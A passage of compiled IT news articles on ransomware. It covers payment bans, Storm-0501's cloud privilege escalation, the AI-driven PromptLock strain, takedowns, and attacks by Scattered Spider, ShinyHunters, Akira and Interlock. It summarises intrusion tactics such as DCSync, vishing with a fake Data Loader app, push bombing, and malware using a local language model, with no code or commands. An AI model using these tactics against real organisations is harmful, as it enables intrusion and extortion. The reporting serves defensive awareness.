At the same time, ransomware payment bans could have other impacts. As well as pushing ransomware groups to target other sectors, it ties the hands of public sector bodies CISOs when their firms are attacked.

The brutal truth is that organizations often pay ransoms because it’s cheaper and less disruptive than recovery. As Boyer points out, no one wants to fund criminal groups. But there are documented cases where public authorities have paid substantially more in remediation than the original ransom.

“Full prohibition with no exceptions means you are not allowed to make a real risk trade off,” he says. And ransomware groups are adept at setting ransoms at a level victims are willing to pay. “They are very strategic in what they charge.”

The ransom payment ban could, as the UK government hopes, disrupt the business model of cybercrime. But it's likely to come at a cost.

The Storm-0501 threat group is refining its tactics, according to Microsoft, shifting away from traditional endpoint-based attacks and toward cloud-based ransomware.

By leveraging cloud-native capabilities, analysis from the tech giant shows Storm-0501 exfiltrates large volumes of data, destroys data and backups within the victim environment, and demands ransom — all at speed and without relying on traditional malware deployment.

This time last year, Microsoft warned that Storm-0501 had extended its on-premises ransomware operations into hybrid cloud environments.

The group has shown to have compromised Active Directory environments before pivoting to Microsoft Entra ID, escalating privileges on hybrid and cloud identities to gain global administrator privileges.

"Storm-0501 has continued to demonstrate proficiency in moving between on-premises and cloud environments, exemplifying how threat actors adapt as hybrid cloud adoption grows," said the Microsoft Threat Intelligence team.

"They hunt for unmanaged devices and security gaps in hybrid cloud environments to evade detection and escalate cloud privileges and, in some cases, traverse tenants in multi-tenant setups to achieve their goals."

How Storm-0501 operates

Microsoft gives the example of one recent campaign in which Storm-0501 compromised a large enterprise composed of multiple subsidiaries. Each operated its own Active Directory domain, all interconnected through domain trust relationships and enabling cross-domain authentication and resource access.

However, only one tenant had Microsoft Defender for Endpoint deployed, and devices from multiple Active Directory domains were onboarded to this single tenant’s license, creating visibility gaps across the environment.

Storm-0501 checked for the presence of Defender for Endpoint services, suggesting a deliberate effort to avoid detection by targeting non-onboarded systems, Microsoft said.

Lateral movement was facilitated using Evil-WinRM, a post-exploitation tool that utilizes PowerShell over Windows Remote Management (WinRM) for remote code execution.

Commands were executed over sessions initiated with Evil-WinRM, as well as discovery using other common native Windows tools and commands such as quser.exe and net.exe.

Earlier in the attack, Storm-0501 had compromised an Entra Connect Sync server that was not onboarded to Defender for Endpoint - and which Microsoft reckons was used as a pivot point, with the group establishing a tunnel to move laterally within the network.

It also carried out a DCSync attack, abusing the Directory Replication Service (DRS) Remote Protocol to simulate the behavior of a domain controller - allowing it to request password hashes for any user in the domain, including privileged accounts.

It then pivoted to the cloud, leveraging the Entra Connect Sync Directory Synchronization Account (DSA) to enumerate users, roles, and Azure resources within the tenant using AzureHound.

"Shortly thereafter, the threat actor attempted to sign in as several privileged users. These attempts were unsuccessful, blocked by Conditional Access policies and multi-factor authentication (MFA) requirements," said the team.

"This suggests that while Storm-0501 had valid credentials, they lacked the necessary second factor or were unable to satisfy policy conditions."

In response, Storm-0501 shifted tactics, traversing between Active Directory domains and eventually moving laterally to compromise a second Entra Connect server and identify an admin identity that didn't have MFA enabled - allowing it to assign a new password.

"From the point that the threat actor was able to successfully meet the Conditional Access policies and sign in to the Azure portal as a Global Admin account, Storm-0501 essentially achieved full control over the cloud domain," researchers said.

"The threat actor then utilized the highest possible cloud privileges to obtain their goals in the cloud."

MORE FROM ITPRO

• MSPs beware – these two ransomware groups are ramping up attacks and have claimed hundreds of victims
• Malware as a service explained: What it is and why businesses should take note
• Nearly half of MSPs admit to having a ransomware kitty

Researchers at cybersecurity firm ESET have discovered what they said is the "first known AI-powered ransomware" strain.

Dubbed ‘PromptLock’, researchers said it uses OpenAI's open source gpt-oss:20b model, released earlier this month, locally via the Ollama API to generate malicious Lua scripts on the fly, which it then executes.

"PromptLock leverages Lua scripts generated from hard-coded prompts to enumerate the local filesystem, inspect target files, exfiltrate selected data, and perform encryption," said researchers Anton Cherepanov and Peter Strycek in posts on several social media sites, including X.

"These Lua scripts are cross-platform compatible, functioning on Windows, Linux, and macOS. Based on the detected user files, the malware may exfiltrate data, encrypt it, or potentially destroy it."

PromptLock is written in Golang and uses the SPECK 128-bit encryption algorithm, developed by the US National Security Agency (NSA), to encrypt files. It sends its requests through Ollama, an open source API for interfacing with large language models.

The Bitcoin address used in the AI prompt for a payment demand is the one associated with the cryptocurrency's creator, Satoshi Nakamoto, whose real identity has never been discovered.

Cherepanov and Strycek said they've identified both Windows and Linux variants uploaded to VirusTotal, a Google-owned service that catalogs malware and checks files for malicious threats.

The good news is that the malware doesn't seem to be fully functional yet - the destruction functionality hasn't been implemented.

"Although multiple indicators suggest the sample is a proof-of-concept (PoC) or work-in-progress rather than fully operational malware deployed in the wild, we believe it is our responsibility to inform the cybersecurity community about such developments," Cherepanov and Strycek said.

Concerns rising over AI ransomware threats

Ransomware gangs have increasingly been using AI to automate communications and enhance their social engineering techniques, research shows.

A recent study from Acronis found that the increase in the use of AI by ransomware gangs appeared to be reflected in their chosen threat vectors. Social engineering and BEC attacks increased from 20% to 25.6% in the first five months of 2025 compared to the same period in 2024.

This, researchers noted, was probably down to the growth in AI use for crafting convincing impersonations.

Earlier this year, Malwarebytes warned that businesses need to be prepared for AI-powered ransomware attacks.

Up to now, AI agents have generally been used to increase the efficiency of attacks, rather than introducing new capabilities or altering the underlying tactics used by hackers.

According to Malwarebytes, though, this could all change soon as attackers use AI more broadly.

"We are in the earliest days of regular threat actors leveraging local/private AI, said John Scott-Railton, a spyware researcher at Citizen Lab, commenting on the ESET research. "And we are unprepared."

MORE FROM ITPRO

• Mandiant says generative AI will empower new breed of information operations, social engineering
• AI breaches aren’t just a scare story any more – they’re happening in real life
• Think DDoS attacks are bad now? Wait until hackers start using AI assistants to coordinate attacks

Electronics manufacturer Data I/O has reported a ransomware attack that took place earlier this month.

Regulatory filings from the firm show it detected a breach of internal IT systems on 6th August.

"Upon discovery, the Company promptly activated its response protocols, took steps to secure its global IT systems and implemented containment measures, including proactively taking certain platforms offline and implementing other mitigation measures," it said.

"The Company also engaged leading cybersecurity experts to support the IT system recovery and conduct a comprehensive investigation,” the Data I/O added.

“Based on the findings, the Company will take additional actions as appropriate, including notifying affected individuals and regulatory authorities in compliance with applicable laws."

According to Data I/O, containment activities have hit IT systems relating to internal and external communications, shipping, receiving, manufacturing production, and various other support functions.

The company hasn't revealed whether it's received a ransomware demand. Similarly, it said there doesn't appear to have been any significant impact on the company’s business operations.

However, Data I/O said it's likely that costs related to the incident, including fees for cybersecurity experts and other advisors, along with the cost of restoring any impacted systems, could have a material impact on its financial results.

Data I/O attack culprits still at large

Data I/O produces electronic device programming systems for integrated circuits, such as flash memory and microcontrollers, with customers including Tesla, Bosch, Amazon, Apple, Google, HP, Microsoft, Siemens, Philips, Sony, and Foxconn.

Around two-thirds of its business currently comes from automotive electronic production, including technology for electric car charging stations. It claims it serves 18 of the world's top 20 automotive electronics suppliers.

Pete Luban, Field CISO at AttackIQ, said given the domain Data I/O works in, it represents a prime target for threat actors.

"Ransomware attacks on manufacturers can have rippling effects down supply chains, especially with Data I/O’s major customers including industry giants like Tesla, Panasonic, Amazon, Google, and Microsoft," he said.

"Manufacturers should use this case as a lesson to enact proactive security measures to mitigate ransomware threats before they’re able to shut down critical systems."

Luban added that security teams should use adversarial emulation to test their defenses against baseline behaviors associated with common ransomware groups:

"This way, organizations can shut off access to sensitive systems and information and keep supply chains intact," he said.

No group has yet claimed responsibility for the attack. However, Scattered Spider or ShinyHunters are likely suspects.

"Given the geopolitics surrounding the chip industry and its high-profile customers, Data I/O is an attractive target for cyber criminals. With shipping delayed, the attack affects not only Data I/O but also the tech giants that rely on their chips to build their products," said Trevor Dearing, director of critical infrastructure at Illumio.

"By hitting critical systems, attackers drive faster payouts and cause deeper damage than traditional data breaches ever did. Ransomware now brings massive downtime, reputational harm, and financial loss."

MORE FROM ITPRO

• Ransomware victims are getting better at haggling with hackers
• The ransomware groups worrying security researchers in 2025
• A major ransomware hosting provider just got hit US with sanctions

Ransom payouts hit record levels this quarter, thanks to a dramatic rise in targeted social engineering attacks.

Analysis from Coveware by Veeam showed that the average ransom payment rocketed to $1.13 million - up 104% from the first quarter. The median payment rose by a similar amount, doubling to $400,000.

This surge was largely down to an increase in payments by larger organizations hit by data exfiltration-only incidents.

The study noted that data theft has now overtaken encryption as the primary extortion method, with exfiltration a factor in 74% of all cases. Meanwhile, multi-extortion tactics and delayed threats are on the rise.

"The second quarter of 2025 marks a turning point in ransomware, as targeted social engineering and data exfiltration have become the dominant playbook,” said Bill Siegel, CEO of Coveware by Veeam.

“Attackers aren’t just after your backups – they’re after your people, your processes, and your data’s reputation."

The quarter’s top ransomware variants were Akira (19%), Qilin (13%), and Lone Wolf (9%), while Silent Ransom and Shiny Hunters entered the top five for the first time.

Ransomware groups target precision

The biggest threats involved social engineering attacks from three major ransomware groups – Scattered Spider, Silent Ransom, and Shiny Hunters.

These groups have now abandoned mass opportunistic attacks for precision strikes, using new impersonation tactics against help desks, employees and third-party service providers.

They regularly exploit vulnerabilities in widely-used platforms such as Ivanti, Fortinet VMware and Windows services, often right after a vulnerability has been publicly disclosed.

Meanwhile, 'lone wolf' attacks by extortionists using generic, unbranded toolkits are on the rise. allowing even mid-tier actors to breach enterprise infrastructure.

Insider threats escalate

Insider and third-party access risks showed an uptick in the quarter, particularly involving business process outsourcing (BPO) partners, contractors, and IT service providers.

"These external parties often hold privileged access but operate outside core security oversight, making them a growing vector of exploitation for credential misuse or social engineering," the researchers point out.

The worst-hit industry sector was professional services at 20%, followed by healthcare and consumer services at 14% each.

Mid-sized companies with between 11 and 1,000 employees made up 64% of victims - a sweet spot, researchers noted, for attackers balancing payout potential against less mature defenses.

Before exfiltrating or encrypting data, attackers are putting effort into mapping networks, enumerating assets and identifying the most valuable systems or datasets. This reconnaissance phase often relies on legitimate admin tools or built-in OS commands, making it hard to spot without contextual analysis.

If it can be detected, though, by monitoring for anomalous enumeration or employing deception technologies such as decoy credentials, honeyfiles or fake infrastructure, this phase can act as an early warning system.

"Organizations must prioritize employee awareness, harden identity controls, and treat data exfiltration as an urgent risk, not an afterthought," advised Siegel.

MORE FROM ITPRO

• A major ransomware hosting provider just got hit US with sanctions
• Ransomware victims are getting better at haggling with hackers
• The new ransomware groups worrying security researchers in 2025

An international law enforcement operation has seized infrastructure used by the infamous BlackSuit ransomware gang, which is believed to have netted more than $370 million in ransom payments over the last three years.

Led by the US Department of Homeland Security, the operation also included the UK, Germany, Ireland, France, Canada, Ukraine, and Lithuania.

It resulted in the takedown of four servers and nine domains, and the seizure of more than $1 million in virtual currency.

“This operation strikes a critical blow to BlackSuit’s infrastructure and operations,” said William Mancino, special agent in charge of the US Secret Service’s Criminal Investigative Division.

“The US Secret Service is committed to working alongside our law enforcement partners to dismantle criminal enterprises and prevent the deployment of malicious ransomware that victimizes businesses and organizations.”

BlackSuit first started out as Quantum ransomware in January 2022 as a direct successor of the Conti group, but rebranded as Royal ransomware in September that year and then to BlackSuit in 2023.

The group is believed to have breached hundreds of organizations in sectors including critical manufacturing, government facilities, healthcare and public health, and commercial facilities.

One attack on the City of Dallas severely affected emergency services, the courts, and government. Another, against the blood plasma collection organization Octapharma, led to the temporary closure of almost 200 blood plasma collection centers across the country.

BlackSuit victims are usually required to pay ransoms in Bitcoin via a darknet website. According to the Justice Department, on one occasion in 2023 a victim paid a Bitcoin ransom worth nearly $1.5 million at the time.

The group used double extortion tactics, encrypting victims’ systems while threatening to leak stolen data to put extra pressure on victims to pay up.

BlackSuit members have already rebranded

It appears that at least some of those behind BlackSuit have now reformed as a new ransomware operation called ‘Chaos’.

Based on the group's encryption methodology, ransom note structure, and the toolset used in the attacks, Cisco Talos reckons the same people are at work.

"Talos assesses with moderate confidence that the new Chaos ransomware group is either a rebranding of the BlackSuit (Royal) ransomware or operated by some of its former members," the firm said in an advisory.

"This assessment is based on the similarities in TTPs, including encryption commands, the theme and structure of the ransom note, and the use of LOLbins and RMM tools in their attacks."

The group's new Ransomware as a Service (RaaS) operation has already been linked to double extortion attacks, with voice-based social engineering the initial access technique, and the use of an encryptor that targets both local and remote storage.

While law enforcement takedowns are welcomed by enterprises and security practitioners alike, there have been a number of occasions where groups simply regroup and rebrand in the aftermath.

In 2020, for example, an international operation to take down the Trickbot botnet was hailed as a major victory for law enforcement. Yet within less than a year it had returned - and with a more potent strain that enabled threat actors to establish greater persistence on networks.

The Emotet takedown, meanwhile, also proved temporary. The Europol-led sting in January 2021 appeared to have crippled the operation, but once again it returned within the space of a year.

Security experts at the time questioned whether the botnet would be shuttered for good. Analysis in November 2021 showed the group's infrastructure had doubled since making a comeback.

“Disrupting ransomware infrastructure is not only about taking down servers — it's about dismantling the entire ecosystem that enables cybercriminals to operate with impunity,” said Michael Prado, deputy assistant director for HSI’s Cyber Crimes Center.

“This operation is the result of tireless international coordination and shows our collective resolve to hold ransomware actors accountable.”

MORE FROM ITPRO

• A major ransomware hosting provider just got hit US with sanctions
• The ransomware groups worrying security researchers in 2025
• Ransomware victims are getting better at haggling with hackers

Managed service providers (MSPs) have been warned to remain vigilant amidst an uptick in attacks by the Akira and Lynx ransomware groups.

Analysis from Acronis shows both groups have upped their game in recent months with improvements to the Ransomware as a Service (RaaS) strategies.

The two groups share a RaaS model and double extortion tactics. Lynx, for example, is believed to incorporate elements of the leaked LockBit source code, while Akira shares similarities with Conti, suggesting a shared codebase heritage.

Both groups compromise systems through the use of stolen credentials, VPN vulnerabilities, reconnaissance, privilege escalation, defense evasion, and data exfiltration and encryption, according to Acronis.

They tend to target small and medium-sized businesses, disabling security software, deleting shadow copies, and clearing event logs to avoid detection and hinder recovery.

Now, researchers at the Acronis Threat Research Unit (TRU) have warned the duo appear to be focusing much of their attention on MSPs.

What you need to know about Akira and Lynx

Akira has attacked more than 220 victims, including MSPs Hitachi Vantara and Toppan Next Tech, as well as many other small businesses such as law firms, accounting firms, and construction companies.

Last year, the group was mostly targeting user VPNs by exploiting various vulnerabilities, including SonicWall Firewall CVE-2024-40766, which allowed attackers to disable firewalls and perform connections to infrastructure.

This year, Akira operators have been observed using stolen or purchased admin credentials to attempt to gain access to machines and servers.

If this works, they disable security software; when it doesn't, they launch remote exfiltration and then encryption using legitimate tools that are often whitelisted and not scanned or monitored.

After obtaining access, attackers performed additional information gathering, lateral movement and detonation of the encryptor.

Lynx, meanwhile, has hit around 145 victims, again mostly small businesses. First spotted in mid 2024, Lynx shares many similarities with INC ransomware.

Working as a RaaS group, Acronis said Lynx threat actors constantly search for affiliates, posting on Russian underground forums and searching for new affiliates.

"While not all victims are MSPs, these gangs don’t discriminate when it comes to targets. They’re ready to strike any organization that promises a decent payout," said Acronis.

"That said, MSPs stand out as prime targets for cyber criminals because they provide access to a network of other customers, amplifying the potential reward."

Lynx typically uses phishing emails to deliver its malware to victims, after which the attackers gather system and infrastructure information, attempt to obtain user credentials, and perform lateral movement to infect more computers in the network.

Recent attacks show that if security software is found, Lynx will try to uninstall it, first exfiltrating files to their servers and detonating the encryptor.

Dray Agha, senior manager of security operations at Huntress, said enterprises of all sizes should be wary of both groups due to their high level of technical proficiency.

"Ransomware groups like Akira and Lynx are relentlessly refining their attacks, specifically targeting the resource-constrained SMB sector with increasingly efficient, recycled tactics like credential theft and various attacks against VPNs," Agha commented.

"The findings underscore the critical need for all businesses, especially SMBs and MSPs, to rigorously enforce fundamental defences," he added.

This includes bolstering multi-factor authentication (MFA), patching of VPNs and "other external-facing systems", as well as "robust, tested backups".

MORE FROM ITPRO

• A major ransomware hosting provider just got hit US with sanctions
• Ransomware victims are getting better at haggling with hackers
• The new ransomware groups worrying security researchers in 2025

Google has revealed customer data was exposed following a breach of a Salesforce database.

An investigation by the Google Threat Intelligence Group (GTIC) found the database, which is used to store information pertaining to small business customers, was targeted by the ShinyHunters cyber criminal group.

“Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off,” Google said.

“The data retrieved by the threat actor was confined to basic and largely publicly available business information, such as business names and contact details."

While no details on the scale of breach were disclosed by Google, ITPro has approached the company for clarification.

The admission came in the wake of an investigation into the tactics, techniques, and procedures (TTPs) of the ShinyHunters group, also known as UNC6040.

According to Google, the ransomware gang frequently targets enterprise Salesforce databases – albeit not through brute force or capitalizing on flaws, but by using social engineering techniques such as phishing or vishing.

“A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal,” the firm explained.

“This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce,” the blog post added.

“During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version.”

Upon gaining access to impacted databases, the threat group is able to access, query, and exfiltrate sensitive information directly from customer environments, the blog post noted.

“This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats,” Google said.

Google is the latest to encounter ShinyHunters

The ShinyHunters threat group has been around for some time, having claimed a number of high-profile victims in recent years. In May 2024, the ransomware outfit claimed responsibility for a breach at Santander which affected millions of customers globally.

At the time, the group said it gained access to a tranche of financial data belonging to around 30 million customers, including credit card details, which was listed on its dark web site.

That incident occurred around the same time as a major breach at Ticketmaster which affected over 560 million customers worldwide. Once again, the group listed a 1.3TB database for sale on BreachForums.

Google’s recent investigation into the ransomware group showed it is once again ramping up activities.

“We believe threat actors using the 'ShinyHunters' brand may be preparing to escalate their extortion tactics by launching a data leak site (DLS),” the company stated in its blog post.

“We continue to monitor this actor and will provide updates as appropriate.”

William Wright, CEO of Closed Door Security, echoed the warning from Google, noting that organisations should take immediate action to shore up Salesforce database protections.

“ShinyHunters has recently executed a huge volume of attacks via Salesforce and it is essential organizations take note of these. The threat actors have also claimed many attacks are still unreported, so we can expect more victims to be announced in coming weeks," he said.

“In the wake of these attacks, organizations are recommended to take steps to secure their Salesforce databases,” Wright added.

“This can be achieved by teaching employees about this attack trend, ensuring MFA is applied to all employee and enterprise accounts, and limiting employee access to the minimum level of privileges they require.”

MORE FROM ITPRO

• A major ransomware hosting provider just got hit US with sanctions
• The ransomware groups worrying security researchers in 2025
• Ransomware victims are getting better at haggling with hackers

More than three-in-ten ransomware victims are being hit multiple times, thanks to ineffective defenses and security fragmentation.

According to Barracuda Networks' Ransomware Insights Report, 57% of organizations fell victim to a successful ransomware attack in the last 12 months, with 31% of victims affected more than once.

A ransom was paid in 32% of cases, rising to 37% among organizations affected twice or more. More than two-in-ten said they'd experienced pressure to make payments through threats to partners, shareholders, and customers, and 16% reported threats to employees.

However, 41% of those who paid a ransom failed to recover all their data, the study noted. Decryption tools provided by the attackers don't always work, or only a partial key may be provided.

Meanwhile, files can be damaged during the encryption and decryption processes - or, sometimes, the ransom is paid but decryption tools aren't supplied.

Many ransomware victims lack basic security, with only 47% using an email security solution, for example, compared with 59% of non-victims. More than seven-in-ten organizations that suffered an email breach were also hit with ransomware.

“The findings make it clear that ransomware is an escalating threat, and fragmented security defenses leave organizations immensely vulnerable,” said Neal Bradbury, chief product officer at Barracuda.

“Too many victims are juggling an unmanageable number of disconnected tools, often introduced with the best intentions to strengthen protection. Tools that can’t work together, or which are not configured correctly, create security gaps and lead to breaches."

Just under a quarter of the ransomware incidents reported involved data encryption, while 27% saw the attackers stealing and publishing data. Hackers infected devices with other malicious payloads in 29% of cases, and installed backdoors for persistence in 21%.

Ransomware attacks are getting worse

The impact of a successful ransomware attack is also growing. Around four-in-ten victims said they'd suffered from reputational harm, with a quarter reporting tangible business impact and a similar number saying they'd lost new business opportunities.

Similarly, around a quarter of the ransomware incidents reported involved the encryption of data, locking endpoints and data theft.

Attacks also featured lateral movement across the network, the infection of multiple endpoints, the installation of additional malicious payloads, privilege elevation, and embedding backdoors and other persistence mechanisms.

To make it harder for victims to restore their data without paying, around one in five attackers accessed and wiped backups and deleted shadow copies of files.

“In many cases attackers can move through victims’ networks, gaining access to devices, data and more without being detected and blocked," said Bradbury.

MORE FROM ITPRO

• 75% of UK business leaders are willing to risk criminal penalties to pay ransoms
• The ransomware boom shows no signs of letting up
• The ransomware groups worrying security researchers in 2025

UK business leaders are overwhelmingly in favor of a ban on ransomware payments in the private sector - but would break such a ban themselves if they thought it was necessary.

The government is proposing a ban on the payment of ransoms by public sector bodies and operators of critical national infrastructure, including the NHS, local councils, and schools.

For the time being, the ban doesn’t extend to private firms. However, analysis from Commvault found that 96% of UK business leaders believe payments should be banned across both the public and private sectors.

In the event of a ban being imposed on private sector firms, three-quarters (75%) admitted they would still pay a ransom themselves if it were the only way to save their organization, regardless of whether civil or criminal penalties applied.

“Paying a ransom rarely guarantees recovery and often increases the likelihood of being targeted again,” said Darren Thomson, field CTO EMEAI at Commvault.

“A well-enforced ban could help take the profit out of ransomware, but it must be matched by greater investment in prevention, detection, and recovery-testing. Without that, more organizations could find themselves exposed at the worst possible moment, with no viable path to recovery.”

The survey found that 94% of business leaders support limiting ransom payments for public bodies, and 99% for private organizations.

However, in real-world situations within the private sector, only 10% said they would actually comply with any ban if they were attacked. A further 15% said they'd be neither likely nor unlikely to comply.

Of those who supported a proposed payment ban, 34% reckoned it would lead to increased government support and intervention to help build up cyber resilience.

Another third thought it would bring down the number of attacks by reducing the incentive for attackers.

Ransom payment bans are a tightrope for private firms

While the government's proposals so far only ban the payment of ransoms by public sector bodies and operators of critical national infrastructure, they do place certain constraints on private firms.

Businesses would be required to notify the government of any intent to pay a ransom - which would then tell them whether or not they'd be breaking the law by sending money to sanctioned cyber criminal groups, many of which are based in Russia. 

“Ransomware and cyber attacks will be a concern for a long time, as international cyber gangs make huge profits from them and use these resources to continually develop their attack tools," says Jane Frankland, CEO of security training firm Knewstart.

MORE FROM ITPRO

• The ransomware groups worrying security researchers in 2025
• Nearly half of MSPs admit to having a ransomware kitty
• Ransomware victims are getting better at haggling with hackers

The Scattered Spider hacking group is on the move again, security agencies have warned, adding new ransomware and improved social engineering techniques to its repertoire.

In a joint international advisory, the FBI and other cybersecurity agencies said the group is now using DragonForce ransomware and other new variants, and is exploiting remote access tools such as AnyDesk to bypass security alerts.

The group has also started using a new social engineering technique, the advisory warned. While the group has been observed posing as IT help desk workers to target employees, it’s now impersonating employees to ask IT teams to reset passwords or transfer MFA tokens.

This technique is used by the group to perform account takeovers in single sign-on (SSO) environments, the FBI noted.

Similarly, the group is also conducting ‘push bombing’ - repeatedly hitting the user with verification requests until one's finally accepted - and SIM swapping attacks, allowing them to intercept text messages containing one-time passwords.

Scattered Spider has also been spotted targeting corporate Snowflake accounts for initial network access and data theft.

Nick Tausek, lead security automation architect at Swimlane, said the new techniques employed by the ransomware outfit should “raise a lot of red flags” and urged enterprises to remain vigilant.

"Access to an organization’s Snowflake allows the group to run thousands of queries immediately and simultaneously, often deploying DragonForce malware to encrypt target organizations’ servers," he explained.

"The potential for vast amounts of stolen data explains why they’ve been successful across multiple industries, from insurance to transportation to retail."

Scattered Spider is infiltrating Teams and Slack

Notably, the FBI advisory warned Scattered Spider has also been infiltrating workplace collaboration platforms like Slack or Microsoft Teams to gather information which is then used in phishing attacks against employees.

Microsoft Exchange email accounts are also a top target for the group, agencies noted.

Reconnaissance on employees involves extensive research of a company website to gather information and “determine the individual’s role in a target organization”.

"These social engineering attempts are enriched by access to personal information derived from social media, open source information, commercial intelligence tools, and database leaks," the advisory added.

The hackers have even set up fake identities and taken part in company teleconferences and remediation and response calls to gather security information.

"Entering incident remediation and response calls undetected in order to identify how security teams are adapting to their attacks is a clever strategy to remain ahead," Tausek said.

"Listening in on these calls gives them access to information like how they’re being hunted, and what adjustments security teams will make to prevent future attacks."

Scattered Spider has been on a rampage

Scattered Spider is believed to have been responsible for a large wave of attacks in recent months, with victims including British retailers and insurance firms.

More recently, threat intelligence reports have suggested the group has turned its attention to the airline industry, which represents a lucrative source of potential victims.

Most targets have been in the UK and US, with Marks & Spencer (M&S), the Co-op, and Harrods all targeted by the ransomware gang.

The agencies advise organizations to keep a watchful eye for unauthorized account activity and 'risky logins' where sign-in attempts have been flagged as suspicious.

They should also maintain offline backups of sensitive data and store it separately from source systems. Similarly, they should focus on enforcing phishing-resistant multifactor authentication (MFA) and implementing application controls to manage software execution.

MORE FROM ITPRO

• Interlock ransomware gang is ramping up activity, CISA warns
• Can the UK ban ransomware payments?
• Nearly half of MSPs admit to having a ransomware kitty

A British transport firm was forced to close after 158 years thanks to a single easily-guessed password.

According to a recent episode of BBC's Panorama, Northamptonshire-based KNP - formerly Knights of Old - was hit by a ransomware demand that it couldn't pay.

The resulting incident saw the company fold, putting 700 people out of work and highlighting the devastating real-world impact of cyber attacks.

The hack was the work of the Akira ransomware group, which gained access by guessing one employee’s weak password. Director Paul Abbott said he hadn't told the employee concerned that it had been their error that led to the firm's closure.

"Would you want to know if it was you?" he said.

The hackers demanded a ransom believed to have been as much as £5 million.

"If you're reading this it means the internal infrastructure of your company is fully or partially dead…Let's keep all the tears and resentment to ourselves and try to build a constructive dialogue," the ransom note read.

KNP’s insurers immediately sent in a cyber crisis team, which found that all of the company’s data had been encrypted and that its servers, backup, and disaster recovery systems had all been locked. Unable to pay the ransom, the company was forced to call in administrators.

"The resurfacing of the KNP ransomware incident through the BBC Panorama documentary is a pertinent reminder of the devastating real-world consequences of cyber crime - not only in terms of data loss, but in terms of the livelihoods that can be severely affected by a single compromised password," said Anne Cutler, cybersecurity expert at Keeper Security.

"That simple breach precipitated the complete collapse of a 158-year-old business, costing hundreds of jobs and leaving lasting damage. What’s especially sobering about this story is not that it was unique in any significant way, but rather, that it was typical."

Password security still has a long way to go

Password security has been a key battleground for cybersecurity experts in recent years, with research showing chronically lax practices among consumers and enterprises alike.

A study from Kaspersky last year, for example, analyzed 193 million compromised passwords available on the dark web, finding that 45% could be guessed by hackers within a minute.

"The destruction of KNP, formally Knights of Old, is a truly sad cybersecurity tale,” Tim Ward, CEO and co-founder of Redflags from ThinkCyber.

“But it is also a tale of simple cyber hygiene issues having a critical impact.”

"We have to take the human factor of security more seriously, or we will see more and more of these sad tales,” Ward added.

In a recent government survey, 43% of UK businesses and 30% of charities reported having experienced a cybersecurity breach or attack in the last 12 months - around 612,000 businesses and 61,000 charities in total.

Cutler noted that a common misstep for many organizations is that they assume they wouldn’t be “worthwhile targets” for cyber criminals. The reality is that any target is viable, she added.

“As this Panorama documentary makes clear, ransomware is not just being deployed on major corporations - it’s targeting the resilience of supply chains, service providers, schools, charities, and local employers like KNP."

MORE FROM ITPRO

• Nearly half of MSPs admit to having a ransomware kitty
• US healthcare data breaches are out of control
• The ransomware boom shows no signs of letting up

Ransomware payments could soon be a thing of the past in the UK – at least that’s the hope of new controls and mandatory reporting requirements to prevent ransomware from inflicting damage on UK businesses.

Under government proposals, public bodies and operators of critical national infrastructure would be banned from paying up when they’re hit by ransomware – and other businesses would have to be transparent when they decide to cough up the cash.

But can we really put a lid on ransomware? And might the new rules have unintended negative consequences?

In this episode, Jane and Rory discuss the UK government’s new ransomware payment ban and what it could mean for the sector.

Highlights

"You can see why ransomware is is such a lucrative operation for these threat groups, because for some businesses, there's very little argument. You know, 'okay, we plan for this, here's the cash, can we have our data back?.' It's a pretty seamless operation."

"There's been a mixed response from the cybersecurity industry. So some have praised it as a bit of a no brainer, others have warned that it really doesn't do very much to defend businesses, as we've been discussing. Jonathan Wright, who is a partner in the UK Data privacy and cybersecurity practice at Hunton, Andrews Kurth LLP law firm, said that the ban risks punishing the victims."

"We are always covering cases of ransomware causing serious damage to businesses and we recently, in fact, published a piece that said that cyber attacks cost UK businesses alone £64 billion a year. That's including ransom payments, but also staff overtime, lost business and all the other associated costs. So it's clear that it has a major impact on the economy."

Footnotes

• Nearly half of MSPs admit to having a ransomware kitty
• A ransomware payments ban risks criminalizing victims
• The end of ransomware payments: How businesses fit into the fight
• Building ransomware resilience to avoid paying out
• UK government officials consider banning ransomware payments

Subscribe 

• Subscribe to The IT Pro Podcast on Apple Podcasts
• Subscribe to The IT Pro Podcast on Spotify
• Subscribe to the IT Pro newsletter
• Join us on LinkedIn

The Interlock ransomware gang is aggressively targeting businesses and critical infrastructure in North America and Europe, according to a new warning from the US Cybersecurity and Infrastructure Security Agency (CISA). stepping up its attacks and changing tactics.

The agency issued an advisory describing how Interlock picks its victims on the basis of opportunity, carrying out financially-motivated attacks based on vectors such as social engineering.

The group's ransomware encryptors work with both Windows and Linux operating systems, and have been spotted encrypting virtual machines (VMs) across both. So far, says CISA, the group has been leaving hosts, workstations, and physical servers unaffected – but this could change in future.

The group uses a broad range of tactics to gain access.

"FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups," CISA said.

Interlock then uses a range of different methods for discovery, credential access, and lateral movement to spread to other systems on the network, before issuing ransom demands.

The group uses a double extortion model, encrypting systems after exfiltrating data, to increase the pressure on victims.

It recently claimed responsibility for an attack on US healthcare provider Kettering Health that caused a company-wide outage, with other victims including kidney care provider DaVita and the UK's West Lothian Council.

The group has carried out 16 confirmed attacks to date per Comparitech data and an additional 17 unconfirmed attacks since last October.

"What sets Interlock apart is its tactical diversity," commented Nick Tausek, lead security automation architect at Swimlane.

"The group has used ClickFix attacks to impersonate IT tools and infiltrate networks, deployed remote access trojans (RATs) to deliver malware, and most recently, adopted double extortion tactics to maximize pressure on victims."

CISA recommended that organizations should prevent initial access by implementing domain name system filtering and web access firewalls, and by training users to spot social engineering attempts.

Leaders should deal with known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date, and segment networks to restrict lateral movement.

And they should implement identity, credential, and access management policies across the organization, requiring multi-factor authentication wherever possible.

"The range and frequency of these attacks highlight just how adaptable modern threat actors have become. Attacks now come from multiple vectors, often at once, and organizations must be ready," said Tausek.

"Regular patching, network segmentation, and proactive defenses are essential. Just as critical is equipping employees with the awareness to recognize social engineering attempts before they lead to compromise.”

MORE FROM ITPRO

• Nearly half of MSPs admit to having a ransomware kitty
• Cybersecurity researchers have spotted a potent new ransomware strain being used in the wild
